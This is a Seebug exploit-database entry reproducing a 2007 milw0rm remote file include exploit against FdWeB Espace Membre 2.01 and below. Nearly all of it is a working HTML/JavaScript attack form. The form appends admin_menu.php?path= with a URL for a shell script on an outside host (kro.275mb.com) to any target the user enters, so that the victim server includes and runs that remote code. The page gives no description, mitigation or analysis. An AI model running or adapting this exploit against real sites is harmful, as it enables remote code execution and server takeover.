Lucene search

K
seebugRootSSV:64407
HistoryJul 01, 2014 - 12:00 a.m.

FdWeB Espace Membre <= 2.01 (path) Remote File Include Exploit

2014-07-0100:00:00
Root
www.seebug.org
11

No description provided by source.


                                                &#60;html&#62;
&#60;head&#62;
&#60;meta http-equiv=&#34;Content-Type&#34; content=&#34;text/html; charset=windows-1254&#34;&#62;
&#60;title&#62;FdWeB Espace Membre &#60;= 2.01(path) Remote File Include Vulnerability&#60;/title&#62;

&#60;script language=&#34;JavaScript&#34;&#62;
 
//&#39;===============================================================================================
//&#39;[Script Name: FdWeB Espace Membre &#60;= 2.01(path) Remote File Include Vulnerability
//&#39;[Coded by   : ajann
//&#39;[Author     : ajann
//&#39;[Contact    : :(
//&#39;[$$         : Free
//&#39;[Using : Write Target after Submit Click
//&#39;===============================================================================================

//&#39;[[ERROR]]]------------------------------------------------------
//&#39;....
//&#39;..
//&#39;&#60;?
//&#39;	$nom = &#34;menu_admin.gif&#34;;
//&#39;	$include_haut = $path.&#34;include/table_text_gh.php&#34;; 
//&#39;	$include_bas = $path.&#34;include/table_text_gb.php&#34;; 
//&#39;	include($include_haut);
//&#39;?&#62;
//&#39;....
//&#39;..
//&#39;[[ERROR]]]---------------------------------------------------------

//# ajann,Turkey
//# ...

   

     //Basic exploit,but any time : ( 
   var path=&#34;/_admin/&#34;
   var adres=&#34;admin_menu.php?&#34; //File name
   var acik =&#34;path=&#34; // Line 5
   var shell=&#34;http://kro.275mb.com/57.txt?&#34; // Shell Script
  
   function command(){
       if (document.rfi.target1.value==&#34;&#34;){
          alert(&#34;Failed..&#34;);
      return false;
    }


  
  rfi.action= document.rfi.target1.value+path+adres+acik+shell; // Ready Target : )
  rfi.submit(); // Form Submit
   }
&#60;/script&#62;

&#60;/head&#62;

&#60;body bgcolor=&#34;#000000&#34;&#62;
&#60;center&#62;

&#60;p&#62;&#60;b&#62;&#60;font face=&#34;Verdana&#34; size=&#34;2&#34; color=&#34;#008000&#34;&#62;FdWeB Espace Membre &#60;= 2.01(path) Remote File Include Vulnerability&#60;/font&#62;&#60;/b&#62;&#60;/p&#62;

&#60;p&#62;&#60;/p&#62;
&#60;form method=&#34;post&#34; target=&#34;getting&#34; name=&#34;rfi&#34; onSubmit=&#34;command();&#34;&#62;
    &#60;b&#62;&#60;font face=&#34;Arial&#34; size=&#34;1&#34; color=&#34;#FF0000&#34;&#62;Target:&#60;/font&#62;&#60;font face=&#34;Arial&#34; size=&#34;1&#34; color=&#34;#808080&#34;&#62;[http://[target]/[scriptpath]&#60;/font&#62;&#60;font color=&#34;#00FF00&#34; size=&#34;2&#34; face=&#34;Arial&#34;&#62;
  &#60;/font&#62;&#60;font color=&#34;#FF0000&#34; size=&#34;2&#34;&#62;&nbsp;&#60;/font&#62;&#60;/b&#62;
  &#60;input type=&#34;text&#34; name=&#34;target1&#34; size=&#34;20&#34; style=&#34;background-color: #808000&#34; onmouseover=&#34;javascript:this.style.background=&#39;#808080&#39;;&#34; onmouseout=&#34;javascript:this.style.background=&#39;#808000&#39;;&#34;&#62;&#60;/p&#62;
  &#60;p&#62;&#60;input type=&#34;submit&#34; value=&#34;Gonder&#34; name=&#34;B1&#34;&#62;&#60;input type=&#34;reset&#34; value=&#34;Sifirla&#34; name=&#34;B2&#34;&#62;&#60;/p&#62;
&#60;/form&#62;
&#60;p&#62;&#60;br&#62;
&#60;iframe name=&#34;getting&#34; height=&#34;337&#34; width=&#34;633&#34; scrolling=&#34;yes&#34; frameborder=&#34;0&#34;&#62;&#60;/iframe&#62;
&#60;/p&#62;

&#60;b&#62;&#60;font face=&#34;Verdana&#34; size=&#34;2&#34; color=&#34;#008000&#34;&#62;ajann&#60;/font&#62;&#60;/b&#62;&#60;/p&#62;
&#60;/center&#62;
&#60;/body&#62;

&#60;/html&#62;

# milw0rm.com [2007-01-13]